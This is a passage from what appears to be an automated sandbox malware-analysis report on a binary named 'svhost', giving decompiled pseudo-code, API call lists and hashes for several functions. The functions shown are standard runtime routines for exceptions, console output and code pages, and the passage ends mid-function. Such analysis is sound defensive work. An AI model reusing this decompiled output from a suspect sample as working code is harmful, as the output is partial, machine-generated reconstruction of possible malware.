                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::exception_ptr::exception_ptrstd::exception_ptr::~exception_ptr$std::make_error_codeunique_lock~unique_lock
                                      • String ID:
                                      • API String ID: 956333363-0
                                      • Opcode ID: b356943ef642f5fffa0a0b0a3a92ebd2b446bbcd5d6354ce69e261b519969d05
                                      • Instruction ID: b9f0d7c44bec0449a2a074c82e5a28746f834690b5a864d22e8d62efa6ea0eb8
                                      • Opcode Fuzzy Hash: b356943ef642f5fffa0a0b0a3a92ebd2b446bbcd5d6354ce69e261b519969d05
                                      • Instruction Fuzzy Hash: 04114F71D04249DBCF04EFA8D852BEEBBB4EB04710F40466DE926772C2DB346609CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5D8B0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E5D8B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v16;
				char _v24;
				char _v44;
				char _v64;
				signed int _t14;
				intOrPtr* _t19;
				void* _t36;

				_t35 = __esi;
				_t34 = __edi;
				_t23 = __ebx;
				_v8 = __ecx;
				_t38 =  *_v8;
				if( *_v8 == 0) {
					_t19 = E00E51D70( &_v16, _t38,  &_v16, 1);
					_t36 = _t36 + 8;
					E00E51F50(__ebx,  &_v44, __edi, __esi,  *_t19,  *((intOrPtr*)(_t19 + 4)));
					E00EA0C81( &_v44, 0xeeda54);
				}
				_t14 =  *(_v8 + 4) & 0x000000ff;
				_t39 = _t14;
				if(_t14 != 0) {
					E00E51F50(_t23,  &_v64, _t34, _t35,  *((intOrPtr*)(E00E51D70( &_v24, _t39,  &_v24, 0x24))),  *((intOrPtr*)(_t15 + 4)));
					return E00EA0C81( &_v64, 0xeeda54);
				}
				return _t14;
			}











                                      0x00e5d8b0
                                      0x00e5d8b0
                                      0x00e5d8b0
                                      0x00e5d8b6
                                      0x00e5d8bc
                                      0x00e5d8bf
                                      0x00e5d8c7
                                      0x00e5d8cc
                                      0x00e5d8d9
                                      0x00e5d8e7
                                      0x00e5d8e7
                                      0x00e5d8ef
                                      0x00e5d8f3
                                      0x00e5d8f5
                                      0x00e5d90f
                                      0x00000000
                                      0x00e5d91d
                                      0x00e5d925

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5D8E7
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      • std::make_error_code.LIBCPMTD ref: 00E5D8C7
                                        • Part of subcall function 00E51D70: std::generic_category.LIBCPMTD ref: 00E51D73
                                        • Part of subcall function 00E51D70: _Smanip.LIBCPMTD ref: 00E51D80
                                        • Part of subcall function 00E51F50: task.LIBCPMTD ref: 00E51FAA
                                      • std::make_error_code.LIBCPMTD ref: 00E5D8FD
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5D91D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throwstd::make_error_code$ExceptionRaiseSmanipstd::generic_categorytask
                                      • String ID:
                                      • API String ID: 795452861-0
                                      • Opcode ID: 335530b565007d14339376e8997b36f6e098b6c77b936970dbbb0a714e1fe323
                                      • Instruction ID: 1981b3543056f5feedafb324a6cf6fce89860f8583ac06c210e72d093860c687
                                      • Opcode Fuzzy Hash: 335530b565007d14339376e8997b36f6e098b6c77b936970dbbb0a714e1fe323
                                      • Instruction Fuzzy Hash: 53014471E04208AFC714EB90DC41F9EB7B8AF59301F44A698F90877191EB71EA0CCBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E51540 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00E51540(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _t13;
				signed int _t14;
				signed int _t37;
				void* _t41;

				_t41 = __eflags;
				_push(0xffffffff);
				_push(0xebfcd0);
				_push( *[fs:0x0]);
				_t13 =  *0xeef074; // 0x221cac15
				_t14 = _t13 ^ _t37;
				_v20 = _t14;
				_push(_t14);
				 *[fs:0x0] =  &_v16;
				E00E515C0( &_v28, 8);
				E00E51390();
				E00E7175D( &_v28, __edx, _t41,  &_v28);
				E00E51430( &_v28);
				E00E513E0();
				 *[fs:0x0] = _v16;
				return E00E89A35(__ebx, _v20 ^ _t37, __edx, __edi, __esi);
			}










                                      0x00e51540
                                      0x00e51543
                                      0x00e51545
                                      0x00e51550
                                      0x00e51554
                                      0x00e51559
                                      0x00e5155b
                                      0x00e5155e
                                      0x00e51562
                                      0x00e5156d
                                      0x00e51575
                                      0x00e5157e
                                      0x00e5158d
                                      0x00e51595
                                      0x00e515a0
                                      0x00e515b5

                                      APIs
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E51575
                                      • __ExceptionPtrCurrentException.LIBCPMT ref: 00E5157E
                                        • Part of subcall function 00E7175D: std::_Ref_count_base::_Decref.LIBCMTD ref: 00E71781
                                      • std::exception_ptr::exception_ptr.LIBCONCRTD ref: 00E5158D
                                      • std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E51595
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exceptionstd::exception_ptr::exception_ptr$CurrentDecrefRef_count_base::_std::_std::exception_ptr::~exception_ptr
                                      • String ID:
                                      • API String ID: 4047371041-0
                                      • Opcode ID: 3ebfe900c10761419f67575ffafbe1b6d5b52c633c8cd936885854ac0a7b6ddf
                                      • Instruction ID: d969cd5a4cf267615804195d336973ce5ec866b77a9b80f70f7a92b2d717d4d6
                                      • Opcode Fuzzy Hash: 3ebfe900c10761419f67575ffafbe1b6d5b52c633c8cd936885854ac0a7b6ddf
                                      • Instruction Fuzzy Hash: E6014F7190410C9BCB08EFA4D892BBEB7B8EB04710F4056A9F916A76C1EB346548CA80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EBEC67 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EBEC67(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xeefa60, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00EBEC50();
					E00EBEC12();
					_t13 = WriteConsoleW( *0xeefa60, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                      0x00ebec84
                                      0x00ebec88
                                      0x00ebec95
                                      0x00ebec9a
                                      0x00ebecb5
                                      0x00ebecb5
                                      0x00ebecbb

                                      APIs
                                      • WriteConsoleW.KERNEL32(00E62ABC,00000008,000000FF,00000000,00E62ABC,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC), ref: 00EBEC7E
                                      • GetLastError.KERNEL32(?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000,00E62ABC,?,00EBAA6C,00E6118D), ref: 00EBEC8A
                                        • Part of subcall function 00EBEC50: CloseHandle.KERNEL32(FFFFFFFE,00EBEC9A,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000,00E62ABC), ref: 00EBEC60
                                      • ___initconout.LIBCMT ref: 00EBEC9A
                                        • Part of subcall function 00EBEC12: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EBEC41,00EBE088,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000), ref: 00EBEC25
                                      • WriteConsoleW.KERNEL32(00E62ABC,00000008,000000FF,00000000,?,00EBE09B,00E62ABC,00000001,00E62ABC,00E62ABC,?,00EBA518,00000000,00000000,00E62ABC,00000000), ref: 00EBECAF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                      • String ID:
                                      • API String ID: 2744216297-0
                                      • Opcode ID: 8a69bf4334547e69a9499a32b97a10fa78c7472154027d5584fbf0e780b51459
                                      • Instruction ID: 4fabda249314f48812b7feae45ccd0b0b2a850233d1c6ef3fd1a3704ad585701
                                      • Opcode Fuzzy Hash: 8a69bf4334547e69a9499a32b97a10fa78c7472154027d5584fbf0e780b51459
                                      • Instruction Fuzzy Hash: 97F01236040158BFCF121FA2EC05DCA7F65FB543A0B114120FA1DB5260C632C964AB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E725A3 Relevance: 6.0, APIs: 4, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E00E725A3(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v12;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				char _v44;
				intOrPtr* _v48;
				void* _t21;
				intOrPtr _t28;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t45;
				intOrPtr* _t48;

				_t21 = E00E686D0(__ecx);
				E00E51BB0( &_v12, GetLastError(), _t21);
				_t37 =  &_v32;
				E00E51F50(__ebx, _t37, __edi, _t21, _v12, _v8);
				E00EA0C81( &_v32, 0xeeda54);
				asm("int3");
				_push(0x20);
				E00E8A38B();
				_t48 = _t37;
				_v48 = _t48;
				_t43 = _a12;
				_t38 = _a12;
				_v28 = _v28 & 0x00000000;
				_v48 = _t48;
				_v24 = 0xf;
				_v44 = 0;
				_t45 = _t38 + 1;
				do {
					_t28 =  *_t38;
					_t38 = _t38 + 1;
				} while (_t28 != 0);
				E00E597D0( &_v44, _t45, _t48, _t43, _t38 - _t45);
				_v8 = _v8 & 0x00000000;
				E00E51E50(__ebx, _t48, _t45, _t48, _a4, _a8,  &_v44);
				E00E595D0( &_v44);
				 *_t48 = 0xec44f0;
				E00E8A346();
				return _t48;
			}
















                                      0x00e725aa
                                      0x00e725bc
                                      0x00e725c4
                                      0x00e725ca
                                      0x00e725d8
                                      0x00e725dd
                                      0x00e725de
                                      0x00e725e5
                                      0x00e725ea
                                      0x00e725ec
                                      0x00e725ef
                                      0x00e725f2
                                      0x00e725f4
                                      0x00e725f8
                                      0x00e725fb
                                      0x00e72602
                                      0x00e72606
                                      0x00e72609
                                      0x00e72609
                                      0x00e7260b
                                      0x00e7260c
                                      0x00e72617
                                      0x00e7261c
                                      0x00e7262c
                                      0x00e72634
                                      0x00e72639
                                      0x00e72641
                                      0x00e72646

                                      APIs
                                      • std::generic_category.LIBCPMTD ref: 00E725AA
                                        • Part of subcall function 00E686D0: _Immortalize.LIBCPMTD ref: 00E686F2
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00E5A37D), ref: 00E725B1
                                      • _Smanip.LIBCPMTD ref: 00E725BC
                                        • Part of subcall function 00E51F50: task.LIBCPMTD ref: 00E51FAA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E725D8
                                        • Part of subcall function 00EA0C81: RaiseException.KERNEL32(?,?,?,00E8A8C2,?,?,?,?,?,?,?,?,00E8A8C2,?,00EEC1B4), ref: 00EA0CE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorExceptionException@8ImmortalizeLastRaiseSmanipThrowstd::generic_categorytask
                                      • String ID:
                                      • API String ID: 2093893244-0
                                      • Opcode ID: 31c8ae353989f73419a5a06a0d420204af703dd63cb834ca46f7711c0fc38bea
                                      • Instruction ID: f1bf3985b81f365bb1349bddc3ec4dad2a1777734e7776dc3b387e5e3b088386
                                      • Opcode Fuzzy Hash: 31c8ae353989f73419a5a06a0d420204af703dd63cb834ca46f7711c0fc38bea
                                      • Instruction Fuzzy Hash: BFE0B671C0411DAB8B01BBE1CC1ADDFBABCAE14340B0025A4BA1572056EA64661E96A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB6DED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E00EB6DED(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t76;
				signed char* _t77;
				int _t79;
				signed int _t84;
				signed char* _t85;
				short* _t86;
				signed int _t87;
				signed char _t88;
				signed int _t89;
				void* _t90;
				signed int _t91;
				signed int _t92;
				short _t93;
				signed int _t94;
				intOrPtr _t96;
				signed int _t97;

				_t90 = __edx;
				_t51 =  *0xeef074; // 0x221cac15
				_v8 = _t51 ^ _t97;
				_t96 = _a8;
				_t79 = E00EB6982(__eflags, _a4);
				if(_t79 == 0) {
					L36:
					E00EB69F3(_t96);
					goto L37;
				} else {
					_t93 = 0;
					_t84 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0xeef870)) != _t79) {
						_t84 = _t84 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t84;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t79 == 0xfde8 || IsValidCodePage(_t79 & 0x0000ffff) == 0) {
								L22:
							} else {
								if(_t79 != 0xfde9) {
									_t13 =  &_v28; // 0xeb6c3b
									_t57 = GetCPInfo(_t79, _t13);
									__eflags = _t57;
									if(_t57 == 0) {
										__eflags =  *0xef3a48 - _t93; // 0x0
										if(__eflags != 0) {
											goto L36;
										} else {
											goto L22;
										}
									} else {
										_t14 = _t96 + 0x18; // 0xeba1b7
										E00EA1270(_t93, _t14, _t93, 0x101);
										 *(_t96 + 4) = _t79;
										__eflags = _v28 - 2;
										 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
										if(_v28 == 2) {
											__eflags = _v22;
											_t76 =  &_v22;
											if(_v22 != 0) {
												while(1) {
													_t88 = _t76[1];
													__eflags = _t88;
													if(_t88 == 0) {
														goto L18;
													}
													_t91 = _t88 & 0x000000ff;
													_t89 =  *_t76 & 0x000000ff;
													while(1) {
														__eflags = _t89 - _t91;
														if(_t89 > _t91) {
															break;
														}
														 *(_t96 + _t89 + 0x19) =  *(_t96 + _t89 + 0x19) | 0x00000004;
														_t89 = _t89 + 1;
														__eflags = _t89;
													}
													_t76 =  &(_t76[2]);
													__eflags =  *_t76;
													if( *_t76 != 0) {
														continue;
													}
													goto L18;
												}
											}
											L18:
											_t25 = _t96 + 0x1a; // 0xeba1b9
											_t77 = _t25;
											_t87 = 0xfe;
											do {
												 *_t77 =  *_t77 | 0x00000008;
												_t77 =  &(_t77[1]);
												_t87 = _t87 - 1;
												__eflags = _t87;
											} while (_t87 != 0);
											_t26 = _t96 + 4; // 0xc033a47d
											 *((intOrPtr*)(_t96 + 0x21c)) = E00EB6944( *_t26);
											_t93 = 1;
										}
										goto L8;
									}
								} else {
									 *(_t96 + 4) = 0xfde9;
									 *((intOrPtr*)(_t96 + 0x21c)) = _t93;
									 *((intOrPtr*)(_t96 + 0x18)) = _t93;
									 *((short*)(_t96 + 0x1c)) = _t93;
									L8:
									 *((intOrPtr*)(_t96 + 8)) = _t93;
									_t12 = _t96 + 0xc; // 0xeba1ab
									_t93 = _t12;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L9:
									E00EB6A58(_t91, _t96);
									L37:
								}
							}
						}
						goto L38;
					}
					_t28 = _t96 + 0x18; // 0xeba1b7
					E00EA1270(_t93, _t28, _t93, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0xeef880;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t85 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t85[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t92 =  *_t85 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t67;
									if(_t92 > _t67) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t34 = _t93 + 0xeef868; // 0x8040201
										 *(_t96 + _t92 + 0x19) =  *(_t96 + _t92 + 0x19) |  *_t34;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t67 = _t85[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t85 =  &(_t85[2]);
								__eflags =  *_t85;
								if( *_t85 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t93 = _t93 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t93 - 4;
					} while (_t93 < 4);
					 *(_t96 + 4) = _t79;
					 *((intOrPtr*)(_t96 + 8)) = 1;
					 *((intOrPtr*)(_t96 + 0x21c)) = E00EB6944(_t79);
					_t46 = _t96 + 0xc; // 0xeba1ab
					_t86 = _t46;
					_t91 = _v36 + 0xeef874;
					_t94 = 6;
					do {
						_t64 =  *_t91;
						_t91 = _t91 + 2;
						 *_t86 = _t64;
						_t49 = _t86 + 2; // 0x8babab84
						_t86 = _t49;
						_t94 = _t94 - 1;
						__eflags = _t94;
					} while (_t94 != 0);
					goto L9;
				}
				L38:
				return E00E89A35(_t79, _v8 ^ _t97, _t90, _t93, _t96);
			}

































                                      0x00eb6ded
                                      0x00eb6df5
                                      0x00eb6dfc
                                      0x00eb6e01
                                      0x00eb6e0d
                                      0x00eb6e12
                                      0x00eb6fc8
                                      0x00eb6fc9
                                      0x00000000
                                      0x00eb6e18
                                      0x00eb6e18
                                      0x00eb6e1a
                                      0x00eb6e1c
                                      0x00eb6e1e
                                      0x00eb6e21
                                      0x00eb6e2d
                                      0x00eb6e2e
                                      0x00eb6e31
                                      0x00eb6e39
                                      0x00000000
                                      0x00eb6e3b
                                      0x00eb6e41
                                      0x00eb6f18
                                      0x00eb6e59
                                      0x00eb6e60
                                      0x00eb6e88
                                      0x00eb6e8d
                                      0x00eb6e93
                                      0x00eb6e95
                                      0x00eb6f0c
                                      0x00eb6f12
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb6e97
                                      0x00eb6e9c
                                      0x00eb6ea1
                                      0x00eb6ea9
                                      0x00eb6eac
                                      0x00eb6eb0
                                      0x00eb6eb6
                                      0x00eb6eb8
                                      0x00eb6ebc
                                      0x00eb6ebf
                                      0x00eb6ec1
                                      0x00eb6ec1
                                      0x00eb6ec4
                                      0x00eb6ec6
                                      0x00000000
                                      0x00000000
                                      0x00eb6ec8
                                      0x00eb6ecb
                                      0x00eb6ed6
                                      0x00eb6ed6
                                      0x00eb6ed8
                                      0x00000000
                                      0x00000000
                                      0x00eb6ed0
                                      0x00eb6ed5
                                      0x00eb6ed5
                                      0x00eb6ed5
                                      0x00eb6eda
                                      0x00eb6edd
                                      0x00eb6ee0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb6ee0
                                      0x00eb6ec1
                                      0x00eb6ee2
                                      0x00eb6ee2
                                      0x00eb6ee2
                                      0x00eb6ee5
                                      0x00eb6eea
                                      0x00eb6eea
                                      0x00eb6eed
                                      0x00eb6eee
                                      0x00eb6eee
                                      0x00eb6eee
                                      0x00eb6ef3
                                      0x00eb6efd
                                      0x00eb6f06
                                      0x00eb6f06
                                      0x00000000
                                      0x00eb6eb6
                                      0x00eb6e62
                                      0x00eb6e62
                                      0x00eb6e65
                                      0x00eb6e6b
                                      0x00eb6e6e
                                      0x00eb6e72
                                      0x00eb6e72
                                      0x00eb6e77
                                      0x00eb6e77
                                      0x00eb6e7a
                                      0x00eb6e7b
                                      0x00eb6e7c
                                      0x00eb6e7d
                                      0x00eb6e7e
                                      0x00eb6fce
                                      0x00eb6fd0
                                      0x00eb6e60
                                      0x00eb6e41
                                      0x00000000
                                      0x00eb6e39
                                      0x00eb6f25
                                      0x00eb6f2a
                                      0x00eb6f32
                                      0x00eb6f32
                                      0x00eb6f36
                                      0x00eb6f39
                                      0x00eb6f3f
                                      0x00eb6f42
                                      0x00eb6f42
                                      0x00eb6f45
                                      0x00eb6f47
                                      0x00eb6f49
                                      0x00eb6f49
                                      0x00eb6f4c
                                      0x00eb6f4e
                                      0x00000000
                                      0x00000000
                                      0x00eb6f50
                                      0x00eb6f53
                                      0x00eb6f6f
                                      0x00eb6f6f
                                      0x00eb6f71
                                      0x00000000
                                      0x00000000
                                      0x00eb6f58
                                      0x00eb6f5e
                                      0x00eb6f60
                                      0x00eb6f66
                                      0x00eb6f6a
                                      0x00eb6f6a
                                      0x00eb6f6b
                                      0x00000000
                                      0x00eb6f6b
                                      0x00000000
                                      0x00eb6f5e
                                      0x00eb6f73
                                      0x00eb6f76
                                      0x00eb6f79
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb6f79
                                      0x00eb6f7b
                                      0x00eb6f7b
                                      0x00eb6f7e
                                      0x00eb6f7f
                                      0x00eb6f82
                                      0x00eb6f85
                                      0x00eb6f85
                                      0x00eb6f8b
                                      0x00eb6f8e
                                      0x00eb6f9d
                                      0x00eb6fa6
                                      0x00eb6fa6
                                      0x00eb6fab
                                      0x00eb6fb1
                                      0x00eb6fb2
                                      0x00eb6fb2
                                      0x00eb6fb5
                                      0x00eb6fb8
                                      0x00eb6fbb
                                      0x00eb6fbb
                                      0x00eb6fbe
                                      0x00eb6fbe
                                      0x00eb6fbe
                                      0x00000000
                                      0x00eb6fc3
                                      0x00eb6fd1
                                      0x00eb6fdf

                                      APIs
                                        • Part of subcall function 00EB6982: GetOEMCP.KERNEL32(00000000,00EB6BF4,00EBA19F,00000000,00000000,00000000,00000000,?,00EBA19F), ref: 00EB69AD
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EB6C3B,?,00000000,00EBA19F,558B0000,?,?,?,?,00000000), ref: 00EB6E4B
                                      • GetCPInfo.KERNEL32(00000000,;l,?,?,00EB6C3B,?,00000000,00EBA19F,558B0000,?,?,?,?,00000000,00000000), ref: 00EB6E8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID: ;l
                                      • API String ID: 546120528-353426666
                                      • Opcode ID: 3a96aff284a5bbc07e8b2e40d5aaa849eed223b0b9c48d05259a22d8767b3398
                                      • Instruction ID: faac3e193df8d0ad02ea66b5457318f87b57f7f024aa6dce4bb7aff69118ce37
                                      • Opcode Fuzzy Hash: 3a96aff284a5bbc07e8b2e40d5aaa849eed223b0b9c48d05259a22d8767b3398
                                      • Instruction Fuzzy Hash: 86513475A002459EDB20CF75D4406FBBBF5FF51308F14606EE096AB2A1D739DA46CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E62190 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E00E62190(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, char _a8) {
				char _v16;
				signed int _v20;
				char _v44;
				signed int _v45;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _t30;
				signed int _t31;
				intOrPtr _t45;
				intOrPtr _t47;
				signed int _t76;

				_t75 = __esi;
				_t74 = __edi;
				_t49 = __ebx;
				_push(0xffffffff);
				_push(0xec0e50);
				_push( *[fs:0x0]);
				_t30 =  *0xeef074; // 0x221cac15
				_t31 = _t30 ^ _t76;
				_v20 = _t31;
				_push(_t31);
				_t2 =  &_v16; // 0xe620e3
				 *[fs:0x0] = _t2;
				_v60 = __ecx;
				_t4 =  &_a8; // 0xe620e3
				_v56 = E00E57A20( *_t4);
				E00E636D0( &_v44);
				E00E63300(__ebx,  &_v44, __edi, __esi, _v56 << 1);
				_v52 = 0;
				while(_v52 < _v56) {
					asm("lfence");
					_t15 =  &_a8; // 0xe620e3
					_v45 =  *((intOrPtr*)(E00E634C0( *_t15, _v52)));
